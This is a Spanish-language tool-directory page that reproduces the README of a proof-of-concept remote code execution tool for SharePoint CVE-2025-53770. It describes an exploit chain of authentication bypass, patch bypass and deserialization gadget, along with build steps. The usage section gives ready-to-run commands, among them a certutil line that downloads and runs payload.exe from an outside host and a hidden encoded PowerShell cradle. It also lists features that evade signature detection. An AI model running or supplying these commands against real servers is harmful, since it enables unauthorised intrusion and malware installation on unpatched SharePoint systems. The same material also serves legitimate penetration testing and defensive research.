Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
OurSharePoint-CVE-2025-53770 — ¿Realmente crees que SharePoint es seguro? | Kitploit
Herramientas/GitHubGitHub/rabbitbong/oursharepoint-cve-2025-53770
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed Teaming
GitHub
rabbitbong/oursharepoint-cve-2025-53770

OurSharePoint-CVE-2025-53770

¿Realmente crees que SharePoint es seguro?

Ver Repositorio
213hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

OurSharePoint — CVE-2025-53770 PoC

Herramienta RCE autónoma para SharePoint en un solo binario. Genera una cadena de gadgets TypeConfuseDelegate como bytes MS-NRBF sin procesar (sin ysoserial.exe), la envuelve en una carga útil de deserialización de DataSet y la entrega a través de HTTP utilizando la omisión de autenticación, todo de una sola vez.


Cadena de Explotación

PasoCVEDescripción
1CVE-2025-49706Omitir autenticación — Referer: /_layouts/SignOut.aspx omite la autenticación de SharePoint
2CVE-2025-53771Bypass de parche — el segmento de ruta final después de ToolPane.aspx evade la corrección de julio de 2025
3CVE-2025-49704Deserialización — ExcelDataSet.CompressedDataTable activa BinaryFormatter en un DataSet manipulado
4—El esquema de DataSet fuerza LosFormatter.Deserialize() en la carga útil interna a través de ExpandedWrapper + ObjectDataProvider
5—TypeConfuseDelegate — el comparador de SortedSet<string> es Process.Start(string, string), ejecutando cmd /c <command>

Todo el flujo binario (tanto el envoltorio externo de DataSet como el gadget interno TypeConfuseDelegate) se construye como registros MS-NRBF sin procesar; no se utiliza serialización en tiempo de ejecución de .NET. Esto coincide byte por byte con el formato producido por el módulo de Metasploit.


Compilación

Requiere .NET Framework 4.8 SDK (Visual Studio 2022 o herramientas de compilación independientes):

& "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe" OurSharePoint.sln /p:Configuration=Release

Salida: OurSharePoint\bin\Release\OurSharePoint.exe (archivo único, sin dependencias)


Uso

Disparo único: preparar y ejecutar

OurSharePoint.exe --cmd="certutil -urlcache -split -f http://10.0.0.5/payload.exe C:\Windows\Temp\p.exe & C:\Windows\Temp\p.exe" --target=https://sp.corp.com

Ejecución de comando simple

OurSharePoint.exe --cmd="whoami > C:\Windows\Temp\pwned.txt" --target=https://sp.corp.com

Cuna de PowerShell

OurSharePoint.exe --cmd="powershell -nop -w hidden -enc <base64>" --target=https://sp.corp.com

Solo reconocimiento (sin carga útil)

OurSharePoint.exe --target=https://sp.corp.com --check

Compilar archivos de carga útil sin conexión

OurSharePoint.exe --cmd="calc.exe" --out=exploit

Con proxy (Burp)

OurSharePoint.exe --cmd="whoami" --target=https://sp.corp.com --proxy=http://127.0.0.1:8080

Heredado: carga útil externa de ysoserial.exe

ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -o base64 -c "cmd /c calc.exe" > gadget.b64
OurSharePoint.exe --in=gadget.b64 --target=https://sp.corp.com

Opciones

FlagDescripciónPredeterminado
--cmd=COMMANDComando a ejecutar (se ejecuta como cmd /c COMMAND)—
--in=FILEArchivo de carga útil LosFormatter precompilado en base64—
--target=URLURL base de SharePoint para la entrega HTTP—
--checkSolo version de huella digital, sin carga útil—
--out=PREFIXPrefijo del archivo de salidapayload
--sp-version=VERVersión de la ruta de diseños (15 o 16)15
--proxy=URLProxy HTTP—
--ua=STRINGUser-Agent personalizadoFirefox 120
--referer=URLSobrescribir el Referer de omisión de autenticaciónauto
--timeout=SECTiempo de espera HTTP15
--a/b/c=NAMENombres de DataSet/elemento/columnaaleatorio

Archivos de salida

Cuando se usa --out, la herramienta escribe:

ArchivoContenido
<prefix>.binFlujo de DataSet BinaryFormatter sin procesar
<prefix>.b64Codificado en GZip + Base64 (lo que va en CompressedDataTable)

Versiones afectadas

EdiciónRango vulnerable
SharePoint Server Subscription Edition16.0.14326.20450 – 16.0.18526.20424
SharePoint Server 201916.0.10337.12109 – 16.0.10417.20027
SharePoint Enterprise Server 201616.0.4351.1000 – 16.0.5508.1000
SharePoint Server 201315.0.4481.1005 – 15.0.5545.1000

Notas de implementación

  • Sin serialización en tiempo de ejecución — Tanto el envoltorio de DataSet como el gadget TypeConfuseDelegate se escriben como registros binarios MS-NRBF sin procesar usando BinaryWriter. Esto evita diferencias entre la salida de serialización en tiempo de ejecución de .NET y lo que espera el deserializador de destino.
  • Encuadre LosFormatter — El gadget interno se envuelve con bytes de encabezado de ObjectStateFormatter (0xFF 0x01 0x32 + longitud de 7 bits) en lugar de usar LosFormatter.Serialize().
  • Binario único — No se requieren herramientas externas, DLL ni scripts de Python. El .exe es completamente autónomo.
  • Aleatorización — Los prefijos de etiquetas XML y los nombres de elementos de DataSet se aleatorizan por ejecución para evitar la detección de firmas.

Referencias

  • Eye Security — SharePoint Under Siege
  • Metasploit PR #20409 — sharepoint_toolpane_rce
  • MS-NRBF Specification
  • pwntester/ysoserial.net — TypeConfuseDelegate
Descargar herramienta